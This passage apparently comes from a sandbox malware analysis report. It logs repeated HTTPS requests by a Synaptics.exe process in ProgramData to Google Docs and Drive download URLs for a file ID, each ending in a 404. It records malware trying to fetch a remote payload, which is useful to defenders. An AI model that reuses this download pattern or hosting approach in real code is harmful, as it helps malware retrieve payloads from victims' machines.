                                                                                                                83192.168.2.759942216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:33 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-z03RpEi8gpm1NMt2i_BlGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                84192.168.2.759944142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:33 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5n-tmSR7Zn0upDr1WBwhYoNb2yQBYI-SvCAxECqeEIAVTrz67dMkPJJ5FGXEfKToGPGCbQRls
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:33 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-T-uNSELM5p0B4HiFDjPHxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 5a 63 77 47 79 74 54 37 42 59 5a 6b 35 53 6c 4e 65 63 70 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="tZcwGytT7BYZk5SlNecpdw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                85192.168.2.759943216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:33 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-WUwcV_hV_Ln9U-E-UVnewg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                86192.168.2.759956142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6ZXv9oNA7Y-XZZJe4OeASFJx4NvYgDwSWz1CVJWNUwbhfMXnCBpTNlZAOqJcARLAB3Rk0aL2Q
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-94vaIbHcTthzyZy8agROgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:34 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:34 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 72 55 65 37 62 36 75 61 6a 49 67 34 69 38 78 65 53 56 70 5f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="urUe7b6uajIg4i8xeSVp_g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:34 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                87192.168.2.759958216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fHbdN5Aqh9gG5dptw8ONlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                88192.168.2.759957216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zvOHNI7XfFrPmIapWmbqJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                89192.168.2.759959142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC78QJF3O3hjFSacub5RmmcHZ1r6YcvBnD8EUKuvemVrQ3i6gw82M25-vZ0NLyIU5pVEC_zKMbw
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0RJjXbhLdygUQh5Ppi2LIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:34 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:34 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 64 53 66 63 6a 49 70 42 5f 6b 6f 35 6f 47 52 66 34 68 79 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="qdSfcjIpB_ko5oGRf4hyzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:34 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                90192.168.2.759966216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:35 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
